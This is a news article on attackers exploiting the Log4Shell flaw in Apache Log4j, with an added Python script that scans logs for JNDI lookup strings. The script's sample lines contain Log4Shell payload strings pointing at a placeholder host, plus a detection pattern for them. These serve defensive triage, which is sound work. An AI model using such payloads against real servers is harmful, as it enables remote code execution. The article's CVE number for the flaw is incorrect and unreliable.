Netlab, the networking security division of Chinese tech behemoth Qihoo 360, revealed that threats such as Mirai and Muhstik (aka Tsunami) are targeting vulnerable systems in order to spread the infection and increase the computing power available for distributed denial-of-service (DDoS) attacks, with the goal of overloading a target and rendering it unusable. Muhstik was previously caught exploiting a critical security flaw in Atlassian Confluence (CVE-2021-26084, CVSS score: 9.8) in September.
Threat actors are actively weaponizing unpatched Log4j servers affected by the newly discovered “Log4Shell” vulnerability to install cryptocurrency miners, Cobalt Strike and recruit the devices into a botnet, despite telemetry evidence pointing to exploitation of the flaw nine days before it was discovered.
VMware, a provider of virtualization technology, has also issued a warning about “exploitation attempts in the wild,” adding that it is releasing patches for a number of its products. Vendors are also scrambling to release bug fixes as a result of the situation. SonicWall, a network security vendor, revealed in an advisory that its Email Security solution is affected, stating that it is working to release a fix for the issue while continuing to investigate the rest of its product line.
The flaw, identified as CVE-2021-22448 (CVSS score: 10.0), is related to a case of remote code execution in Log4j, a Java-based open-source Apache logging framework widely used in enterprise applications to record events and messages generated by software.
According to an analysis by the Microsoft 365 Defender Threat Intelligence Team, “Depending on the nature of the vulnerability, once an attacker has full access and control of an application, they can accomplish a wide range of goals. The majority of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.”
To exploit the vulnerability, an adversary only needs to send a specially crafted string containing the malicious code; once that string is logged by Log4j version 2.0 or higher, the threat actor can effectively make the application load arbitrary code.
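As an added defensive illustration, not part of the original article: the crafted string described above is a Log4j lookup expression, and a first triage step is to scan existing application or access logs for lines that contain a `${jndi:` lookup. The log lines and hostnames below are constructed samples, not real traffic.

```python
import re

# Constructed sample access-log lines (not real traffic). Two of them carry a
# Log4j lookup string in a logged User-Agent field, the rest are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 "${JNDI:rmi://example.invalid/b}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /health HTTP/1.1" 200 "curl/7.79"',
]

# Log4j 2 expands "${...}" lookups found in logged messages; the "jndi" lookup
# is the one abused by Log4Shell. Match case-insensitively and tolerate
# whitespace so that trivially varied casing does not slip past the scan.
LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def find_lookup_attempts(lines):
    """Return (line_number, scheme, line) for every line containing a jndi lookup.

    The scheme (e.g. ldap, rmi, dns) is extracted to help prioritise follow-up:
    a dns-only lookup is typically scanning, while ldap/rmi indicates an attempt
    to fetch remote code.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOOKUP_RE.search(line)
        if match:
            hits.append((number, match.group(1).lower(), line))
    return hits


def summarize(lines):
    """Count jndi lookup attempts per source IP (first field of each line)."""
    counts = {}
    for _, _, line in find_lookup_attempts(lines):
        source_ip = line.split(" ", 1)[0]
        counts[source_ip] = counts.get(source_ip, 0) + 1
    return counts


if __name__ == "__main__":
    for number, scheme, line in find_lookup_attempts(SAMPLE_LOG_LINES):
        print(f"line {number}: {scheme} lookup -> {line}")
    print(summarize(SAMPLE_LOG_LINES))
```

Run this against exported log files for the days before and after the disclosure; a hit only proves an attempt was logged, so confirm impact by checking for outbound connections from the host to the embedded address.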
Finally, Huntress Labs Senior Security Researcher John Hammond concluded, “There is no immediate target for this vulnerability — hackers are wreaking havoc in a spray-and-pray fashion.” In fact, cases like these demonstrate how a single flaw, when discovered in packages included in a large number of software products, can have far-reaching consequences, acting as a conduit for additional attacks and posing a critical risk to affected systems. “All threat actors need is one line of text to launch an attack.”